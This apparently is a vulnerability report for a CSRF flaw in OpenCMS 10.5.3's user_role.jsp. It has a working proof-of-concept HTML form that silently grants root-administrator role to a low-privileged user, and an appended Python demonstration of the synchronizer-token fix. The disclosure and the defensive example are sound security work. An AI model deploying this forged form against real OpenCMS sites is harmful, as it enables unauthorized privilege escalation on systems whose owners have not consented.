Closed
Description
Hi Team, I would like to report multiple CSRF vulnerabilities in the latest version. mitre.org assigned a new CVE for this vulnerability.
Description:
Cross-site request forgery (CSRF) vulnerability in opencms/system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation.
Steps to Reproduce:
- Send the crafted request below to a logged-in user who has Root Administrator level access.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.146.131:8080/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
<input type="hidden" name="dialogtype" value="" />
<input type="hidden" name="root" value="" />
<input type="hidden" name="sortcol" value="" />
<input type="hidden" name="preactiondone" value="" />
<input type="hidden" name="oufqn" value="" />
<input type="hidden" name="resource" value="" />
<input type="hidden" name="userid" value="replace with actual user id of low privileged user." />
<input type="hidden" name="closelink" value="%2Fopencms%2Fsystem%2Fworkplace%2Fviews%2Fadmin%2Fadmin-main.jsp%3Fpath%3D%2Faccounts%2Forgunit%2Fusers%26action%3Dinitial" />
<input type="hidden" name="framename" value="" />
<input type="hidden" name="ispopup" value="" />
<input type="hidden" name="originalparams" value="" />
<input type="hidden" name="message" value="" />
<input type="hidden" name="selitems" value="RoleRootAdmins" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="style" value="new" />
<input type="hidden" name="page" value="" />
<input type="hidden" name="base" value="" />
<input type="hidden" name="path" value="%2Faccounts%2Forgunit%2Fusers%2Fedit%2Frole" />
<input type="hidden" name="action" value="listmultiaction" />
<input type="hidden" name="searchfilter" value="" />
<input type="hidden" name="redirect" value="" />
<input type="hidden" name="force" value="" />
<input type="hidden" name="formname" value="lsre-form" />
<input type="hidden" name="listaction" value="ma" />
<input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Once the logged-in user opens the URL, the form is submitted with the root administrator's active session and the action is performed successfully.
Fix:
Implementing a random token in every state-changing request will mitigate the issue.
Affected Version:
10.5.3 release
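The fix the reporter suggests is the synchronizer token pattern: the server stores a random, unguessable token in the user's session, embeds it in every form it renders, and rejects any state-changing request that does not carry a matching token. Because a cross-origin page cannot read the victim's session token, a forged form like the one above arrives without it and is refused. The following is an added, self-contained demonstration of that check written for this page; it is not OpenCms code (OpenCms is a Java/JSP application, where the same logic would live in a servlet filter), and the `Session`, `Request`, `csrf_token` field name and the in-memory request model are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Constructed stand-ins for a web container's session and request objects
# (assumption: a real deployment would use HttpSession / HttpServletRequest).
@dataclass
class Session:
    user: str
    # One random token per session, generated server-side; 32 bytes of entropy.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))

@dataclass
class Request:
    method: str
    path: str
    form: Dict[str, str]
    session: Optional[Session] = None

STATE_CHANGING = {"POST", "PUT", "DELETE", "PATCH"}
TOKEN_FIELD = "csrf_token"  # hypothetical hidden-field name used by the forms

def render_hidden_field(session: Session) -> str:
    """The hidden input the server embeds in every form it renders."""
    return f'<input type="hidden" name="{TOKEN_FIELD}" value="{session.csrf_token}" />'

def csrf_check(request: Request) -> Tuple[bool, str]:
    """Return (allowed, reason).

    Safe methods pass through; state-changing requests must carry a token
    that equals the one stored in the caller's own session.
    """
    if request.method not in STATE_CHANGING:
        return True, "safe method"
    if request.session is None:
        return False, "no session"
    submitted = request.form.get(TOKEN_FIELD)
    if not submitted:
        return False, "missing token"
    # Constant-time comparison so the check itself does not leak the token.
    if not hmac.compare_digest(submitted.encode(), request.session.csrf_token.encode()):
        return False, "token mismatch"
    return True, "token ok"

def handle(request: Request) -> Tuple[int, str]:
    """Gate every request through the CSRF check before dispatching it."""
    allowed, reason = csrf_check(request)
    if not allowed:
        return 403, reason
    # A real application would dispatch to the action handler here
    # (for example, the role-assignment action behind user_role.jsp).
    return 200, "action performed"

if __name__ == "__main__":
    admin = Session(user="Admin")
    target = "/opencms/system/workplace/admin/accounts/user_role.jsp"
    # A cross-site form can post with the victim's cookies but cannot read
    # the token, so it arrives without one (constructed forged request).
    forged = Request("POST", target,
                     {"userid": "low-priv-user", "listMultiAction": "RoleRootAdmins"},
                     session=admin)
    # A form rendered by the server itself carries the session's token.
    legitimate = Request("POST", target,
                         {"userid": "low-priv-user", "listMultiAction": "RoleRootAdmins",
                          TOKEN_FIELD: admin.csrf_token},
                         session=admin)
    print("forged:", handle(forged))          # (403, 'missing token')
    print("legitimate:", handle(legitimate))  # (200, 'action performed')
```

The same check must be applied to every state-changing endpoint, not only the one named in the report; a token that is present but compared with a plain `==` or accepted when empty would reintroduce the weakness.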